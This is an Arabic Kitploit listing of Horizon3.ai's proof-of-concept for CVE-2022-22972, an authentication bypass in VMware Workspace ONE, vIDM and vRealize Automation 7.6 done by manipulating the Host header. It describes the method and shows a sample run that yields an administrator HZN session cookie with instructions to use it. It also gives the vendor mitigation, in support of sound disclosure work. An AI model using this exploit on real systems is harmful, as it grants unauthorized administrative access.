Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-22972 — إثبات مفهوم لاستغلال CVE-2022-22972 الذي يتجاوز المصادقة في VMware Workspace ONE وvIDM وvRealize Automation 7.6 عبر التلاعب برأس Host. | Kitploit
أدوات/GitHubGitHub/horizon3ai/cve-2022-22972
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالفريق الأحمر
GitHubhorizon3ai/cve-2022-22972

CVE-2022-22972

إثبات مفهوم لاستغلال CVE-2022-22972 الذي يتجاوز المصادقة في VMware Workspace ONE وvIDM وvRealize Automation 7.6 عبر التلاعب برأس Host.

عرض المستودع
1502710منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-22972

POC لـ CVE-2022-22972 الذي يؤثر على VMware Workspace ONE و vIDM و vRealize Automation 7.6.

التحليل الفني

يمكن العثور على تحليل تقني لجذر سبب الثغرة على مدونتنا: https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive

الملخص

يمكن استخدام هذا السكربت لتجاوز المصادقة على vRealize Automation 7.6 باستخدام CVE-2022-22972. تمتلك Workspace ONE و vIDM نقطتي نهاية مصادقة مختلفتين، لكن جوهر الثغرة يظل كما هو. يسعدنا قبول طلبات السحب (pull requests) إذا كانت لديكم أجهزة اختبار للتحقق من التدفق.

يعمل هذا السكربت عن طريق تغيير ترويسة Host لطلب HTTP POST موجه إلى نقطة نهاية مصادقة VMware إلى Host يتحكم فيه المهاجم. يؤدي ذلك إلى قيام تطبيق VMware بالتواصل مع الـ Host حاملًا معلومات الاعتماد، وإذا أعاد الـ Host استجابة 200، يتم مصادقة المستخدم بنجاح.

ينتج عن هذا السكربت كوكي HZN يمكن تضمينها مع الطلبات اللاحقة لتنفيذ إجراءات بصفة المستخدم المخترَق.

ملاحظة: سترسل الوسائط الافتراضية للسكربت طلب المصادقة إلى بوابة AWS API الخاصة بنا والمهيأة للرد برمز 200 لنقطة النهاية المحددة المذكورة في المدونة. يمكنك تغيير ذلك باستخدام خيار --host. لن تتلقى نقطة النهاية هذه أي بيانات حساسة أثناء تدفق الاستغلال - فقط طلبًا من التطبيق الضعيف يحمل ترويسة المصادقة المزيفة التي ترد عليها.

الاستخدام

dev@ubuntu:~/vmware/vra/exploit$ python3 CVE-2022-22972.py https://vra-app01.vra.intranet
Extracting state from vcac redirects...
Sending POST to auth endpoint

HZN=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJqdGkiOiJiM2E3MDJiOS01NjJkLTQwODgtYTg2Ny0xZjY5ZWE4YjAyZjMiLCJwcm4iOiJhZG1pbmlzdHJhdG9yQFZTUEhFUkUuTE9DQUwiLCJkb21haW4iOiJ2c3BoZXJlLmxvY2FsIiwidXNlcl9pZCI6IjMiLCJhdXRoX3RpbWUiOjE2NTM0MjUwOTAsImlzcyI6Imh0dHBzOi8vZWkzd3B0OTEwMC5leGVjdXRlLWFwaS51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9TQUFTL3QvdnNwaGVyZS5sb2NhbC9hdXRoIiwiYXVkIjoiaHR0cHM6Ly9laTN3cHQ5MTAwLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMi5hbWF6b25hd3MuY29tL1NBQVMvdC92c3BoZXJlLmxvY2FsL2F1dGgvb2F1dGh0b2tlbiIsImN0eCI6Ilt7XCJtdGRcIjpcInVybjp2bXdhcmU6bmFtZXM6YWM6Y2xhc3NlczpMb2NhbFBhc3N3b3JkQXV0aFwiLFwiaWF0XCI6MTY1MzQyNTA5MCxcImlkXCI6M31dIiwic2NwIjoicHJvZmlsZSBhZG1pbiB1c2VyIGVtYWlsIG9wZXJhdG9yIiwiaWRwIjoiMiIsImVtbCI6ImFkbWluaXN0cmF0b3JAdnJhLWFwcDAxLnZyYS5pbnRyYW5ldCIsImNpZCI6IiIsImRpZCI6IiIsIndpZCI6IiIsInJ1bGVzIjp7ImV4cGlyeSI6MTY1MzQyNjg5MCwicnVsZXMiOlt7InJlc291cmNlcyI6WyIqIl0sImFjdGlvbnMiOlsiKiJdLCJjb25kaXRpb25zIjpudWxsfV0sImxpbmsiOm51bGx9LCJleHAiOjE2NTM0MjY4OTAsImlhdCI6MTY1MzQyNTA5MCwic3ViIjoiYWQzODkzODEtNTRmNS00ODFkLWFmNWEtOWZjNmIzOGI0NzQ0IiwicHJuX3R5cGUiOiJVU0VSIn0.Kkq2UnmqpW6yJb3GGCp7dSXc5PlU1y8YyDULIYLHIvYlB3OC4j5xFDy91a2tk4bi1lAUITymV-NUgweoCl15LXFVfBFYLEs-OAvMLKZhhGnFF-BrxmyYLPJutkxsi-gL0rF4VmYykuYw9tdUY2DghWiGGZ6QTYOts21QUzcvU-8

Set the HZN cookie in your browser to bypass authentication

التخفيفات

قم بالتحديث إلى أحدث إصدار أو خفف من الثغرة باتباع التعليمات الواردة في VMSA

  • https://www.vmware.com/security/advisories/VMSA-2022-0014.html

تابع فريق الهجمات Horizon3.ai على تويتر لآخر أبحاث الأمان:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

إخلاء المسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا بموجب إذن صريح. القائمون على صيانة المشروع غير مسؤولين ولا يتحملون أي تبعة عن إساءة استخدام هذا البرنامج. استخدمه بمسؤولية.

تنزيل الأداة